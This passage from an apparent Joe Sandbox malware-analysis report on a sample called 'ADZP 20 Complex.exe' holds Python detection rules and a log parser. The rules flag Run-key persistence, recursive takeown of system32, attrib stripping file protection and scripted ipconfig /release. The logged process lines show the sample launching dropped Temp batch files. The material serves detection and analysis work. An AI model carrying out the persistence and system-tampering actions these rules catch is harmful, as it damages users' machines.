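            and re.search(r"\badd\b.*\\currentversion\\run\b", cl, re.I) is not None
            and re.search(r'/d\s+"?[^\s"]+\.(bat|cmd|vbs|js|jse|wsf)\b', cl, re.I) is not None)


def rule_recursive_takeown_system_dir(e):
    """takeown /r against the Windows system directories."""
    cl = e["CommandLine"]
    return (image_name(e["Image"]) == "takeown.exe"
            and re.search(r"(^|\s)/r\b", cl, re.I) is not None
            and re.search(r"\\windows\\(system32|syswow64)\b", cl, re.I) is not None)


def rule_attrib_strip_protection(e):
    """attrib removing read-only, system and hidden bits from every file at once."""
    tokens = e["CommandLine"].lower().split()
    return (image_name(e["Image"]) == "attrib.exe"
            and all(flag in tokens for flag in ("-r", "-s", "-h"))
            and "*.*" in tokens)


def rule_script_host_user_profile_script(e):
    """cmd.exe launching wscript/cscript on a script that lives under C:\\Users."""
    return (image_name(e["ParentImage"]) == "cmd.exe"
            and image_name(e["Image"]) in ("wscript.exe", "cscript.exe")
            and re.search(r'\\users\\[^"]+\.(vbs|vbe|js|jse|wsf)\b', e["CommandLine"], re.I) is not None)


def rule_ipconfig_release_from_cmd(e):
    """Scripted network disruption: ipconfig /release from a shell rather than a user session."""
    return (image_name(e["ParentImage"]) == "cmd.exe"
            and image_name(e["Image"]) == "ipconfig.exe"
            and re.search(r"/release\b", e["CommandLine"], re.I) is not None)


def rule_msg_broadcast(e):
    """msg * <text>: a message pushed to every session, typical of prank/scare payloads."""
    return (image_name(e["Image"]) == "msg.exe"
            and re.match(r"\s*msg\s+\*", e["CommandLine"], re.I) is not None)


RULES = [
    ("run_key_persistence_to_script", rule_run_key_to_script),
    ("recursive_takeown_system_dir", rule_recursive_takeown_system_dir),
    ("attrib_strip_protection", rule_attrib_strip_protection),
    ("script_host_runs_user_profile_script", rule_script_host_user_profile_script),
    ("ipconfig_release_from_cmd", rule_ipconfig_release_from_cmd),
    ("msg_broadcast", rule_msg_broadcast),
]


def classify(event):
    """Names of all rules the event satisfies (empty list for benign events)."""
    return [name for name, pred in RULES if pred(event)]


def triage(events):
    """Map event index -> matched rule names, for events that hit at least one rule."""
    return {i: hits for i, e in enumerate(events) if (hits := classify(e))}


if __name__ == "__main__":
    for idx, hits in triage(EVENTS).items():
        print(f"event {idx}: {', '.join(hits)}  <- {EVENTS[idx]['CommandLine']}")
```

The rules key on Image and CommandLine rather than on file hashes because every binary here is a signed Windows tool; what is anomalous is the combination of parent, tool and arguments. The reg.exe rule deliberately requires the add verb and a script extension in the /d value so that the routine `reg query` of the Run key used by inventory tooling does not fire.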
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B132.tmp\B133.tmp\B134.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown (43 identical rows)
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown (42 identical rows)
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\BE03.tmp\BE04.tmp\BE05.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Section loaded: winmm.dll
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: edputil.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: policymanager.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: appresolver.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: bcp47langs.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: slc.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: sppc.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: pcacli.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: sfc_os.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: apphelp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                  Source: C:\Windows\System32\takeown.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\takeown.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\ipconfig.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\ipconfig.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\ipconfig.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\taskkill.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\taskkill.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\taskkill.exe | Section loaded: framedynos.dll
                  Source: C:\Windows\System32\taskkill.exe | Section loaded: dbghelp.dll
                  Source: C:\Windows\System32\taskkill.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\taskkill.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\taskkill.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\taskkill.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\taskkill.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\taskkill.exe | Section loaded: wbemcomn.dll
                  Source: C:\Windows\System32\taskkill.exe | Section loaded: winsta.dll
                  Source: C:\Windows\System32\taskkill.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\taskkill.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\taskkill.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
                  Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
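The entries above are the flattened form of the report's process-creation and module-load tables. The following Python script is an added example, not part of the Joe Sandbox report: it parses lines in exactly this flattened shape (source cell run together with the behaviour cell, optional "Jump to behavior" link text) and flags the indicators this page lists, namely the sample launching cmd.exe on a .bat dropped under the user's Temp directory with the sample's own path as the batch argument (the self-deletion pattern), a WSH host that loaded vbscript.dll together with amsi.dll, and the takeown/ipconfig/taskkill/attrib processes appearing as sources. The sample lines are copied from this page; because the page carries no process IDs, the script merges every instance of the same image into one module list, which is an assumption of this example rather than something the report states.

```python
"""Parse flattened Joe Sandbox behaviour lines and flag the indicators the report lists.
Added example: the regexes, field names and merging of same-image instances are this
script's assumptions, not part of the Joe Sandbox report format."""
import re
from collections import defaultdict

# Constructed sample input: lines copied from the report in the flattened form they
# appear on this page (cell separator lost, some lines carry the "Jump to behavior" link).
SAMPLE_LINES = [
    r'Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown',
    r'Source: C:\Users\user\Desktop\ADZP 20 Complex.exeProcess created: C:\Windows\System32\cmd.exe '
    r'"C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.bat '
    r'"C:\Users\user\Desktop\ADZP 20 Complex.exe""',
    r'Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior',
    r'Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior',
    r'Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior',
    r'Source: C:\Windows\System32\takeown.exeSection loaded: ntmarta.dllJump to behavior',
    r'Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dll',
    r'Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll',
    r'Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll',
]

# "Source: <image><kind>: <detail>[Jump to behavior]"; the lazy source group stops at
# the first "Process created" / "Section loaded" that follows the image path.
LINE_RE = re.compile(
    r'^Source:\s*(?P<source>.+?)(?P<kind>Process created|Section loaded):\s*'
    r'(?P<detail>.*?)(?:Jump to behavior)?$'
)
# cmd /c "<...>\AppData\Local\Temp\<...>.bat "<argument>"" as in the two launches above.
BAT_DROP_RE = re.compile(
    r'/c\s+"(?P<bat>[^"]*?\\AppData\\Local\\Temp\\[^"]*?\.bat)\s+"(?P<arg>[^"]+)""?',
    re.IGNORECASE,
)
SCRIPT_HOSTS = {'wscript.exe', 'cscript.exe'}
SCRIPT_ENGINES = {'vbscript.dll', 'jscript.dll'}
LOLBINS = {'takeown.exe', 'ipconfig.exe', 'taskkill.exe', 'attrib.exe'}


def basename(path):
    return path.rsplit('\\', 1)[-1].lower()


def parse_lines(lines):
    """Return (process-creation events, modules per source image).
    The page has no PIDs, so all instances of one image share a module list."""
    created = []                 # (source path, detail) for "Process created"
    modules = defaultdict(list)  # source path -> loaded DLLs, lowercase, in order
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        source, detail = m.group('source'), m.group('detail').strip()
        if m.group('kind') == 'Process created':
            created.append((source, detail))
        else:
            modules[source].append(detail.lower())
    return created, modules


def find_batch_droppers(created, sample_path):
    """Paths of .bat files the sample ran via cmd /c with its own path as argument."""
    hits = []
    for source, detail in created:
        if source.lower() != sample_path.lower():
            continue
        m = BAT_DROP_RE.search(detail)
        if m and m.group('arg').lower() == sample_path.lower():
            hits.append(m.group('bat'))
    return hits


def script_hosts_with_engine(modules):
    """WSH hosts that loaded a script engine; amsi.dll next to it means the script
    text was handed to AMSI before execution (what the registered AV does with it
    is not visible in a module-load list)."""
    hosts = {}
    for source, dlls in modules.items():
        image = basename(source)
        if image in SCRIPT_HOSTS:
            engines = sorted(SCRIPT_ENGINES.intersection(dlls))
            if engines:
                hosts[image] = {'engines': engines, 'amsi': 'amsi.dll' in dlls}
    return hosts


def lolbins_seen(modules):
    return sorted({basename(s) for s in modules} & LOLBINS)


def summarize(lines, sample_path):
    created, modules = parse_lines(lines)
    return {
        'unresolved_children': sum(1 for _, d in created if d == 'unknown unknown'),
        'batch_droppers': find_batch_droppers(created, sample_path),
        'script_hosts': script_hosts_with_engine(modules),
        'lolbins': lolbins_seen(modules),
    }


if __name__ == '__main__':
    report = summarize(SAMPLE_LINES, r'C:\Users\user\Desktop\ADZP 20 Complex.exe')
    for key, value in report.items():
        print(f'{key}: {value}')
```

Feeding the full behaviour section through `summarize` gives the two dropped batch paths from the cmd.exe launches, the count of child processes the report could not resolve, and which LOLBins ran; the per-image module merge is the limitation to keep in mind, since it cannot tell eight wscript.exe instances apart.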
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textshaping.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: textinputframework.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
